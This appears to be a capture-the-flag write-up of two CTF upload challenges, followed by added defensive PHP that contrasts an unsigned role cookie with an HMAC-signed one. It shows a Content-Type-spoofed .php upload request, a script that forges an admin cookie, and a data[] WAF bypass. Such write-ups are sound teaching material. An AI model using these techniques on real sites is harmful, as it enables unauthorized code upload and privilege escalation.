Do you know upload?
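Upload challenge from the 3rd Baiyue Cup (百越杯): just set Content-Type: image/jpeg in the request. The .php filename does not even need to be changed, and the upload goes through.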
------WebKitFormBoundarytJvTA9B9Lb4TVKYS
Content-Disposition: form-data; name="file"; filename="1.php"
Content-Type: image/jpeg
who are you?
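Upload challenge from the 2nd Qiangwang Cup (强网杯): the page responds with "Sorry. You have no permissions". The cookie contains a field role=Zjo1OiJ0aHJmZyI7; base64-decoding it reveals a further layer of rot13.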
<?php
// echo str_rot13(base64_decode('Zjo1OiJ0aHJmZyI7'));
$a = 's:5:"admin";';
echo base64_encode(str_rot13($a));
?>
Change the value to admin and replace the cookie; the response then contains this hint:
<!-- $filename = $_POST['filename']; $data = $_POST['data']; -->
</html>
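POSTing shows that angle brackets are blocked by the WAF; using data[] as the parameter name instead of data bypasses the check, and the upload succeeds.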
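
The role cookie in "who are you?" is only encoded (base64 over rot13), so the server cannot tell a value it issued from one the client built. The added example below, which is not the challenge's code, puts that scheme beside an HMAC-signed cookie that rejects a swapped role. ROLE_KEY, ROLES and the function names are assumptions made for illustration.

```php
<?php
// Added example (not the challenge's code). ROLE_KEY, ROLES and the function
// names are hypothetical; the key is a constructed placeholder.
const ROLE_KEY = 'constructed-demo-key-load-from-server-config';
const ROLES = ['guest', 'admin'];

// Scheme used by the challenge cookie: base64(rot13(serialize($role))).
// No secret is involved, so any client can produce a valid value.
function weak_decode(string $cookie): string
{
    return str_rot13((string) base64_decode($cookie));
}

// Hardened form: base64 payload plus an HMAC-SHA256 tag over it.
function issue_role(string $role): string
{
    $payload = base64_encode($role);
    return $payload . '.' . hash_hmac('sha256', $payload, ROLE_KEY);
}

// Returns the role only if the tag verifies and the role is allowlisted.
function read_role(string $cookie): ?string
{
    $parts = explode('.', $cookie, 2);
    if (count($parts) !== 2) {
        return null;
    }
    [$payload, $tag] = $parts;
    // Constant-time comparison of the expected and supplied tags.
    if (!hash_equals(hash_hmac('sha256', $payload, ROLE_KEY), $tag)) {
        return null;
    }
    $role = base64_decode($payload, true);
    // Plain string, never unserialize() on client-controlled data.
    return in_array($role, ROLES, true) ? $role : null;
}

// The cookie value from the write-up decodes without any key.
var_dump(weak_decode('Zjo1OiJ0aHJmZyI7'));

// A server-issued guest cookie verifies.
$cookie = issue_role('guest');
var_dump(read_role($cookie));

// Constructed tampering: payload swapped to "admin", old tag kept.
$tag = explode('.', $cookie, 2)[1];
var_dump(read_role(base64_encode('admin') . '.' . $tag));
```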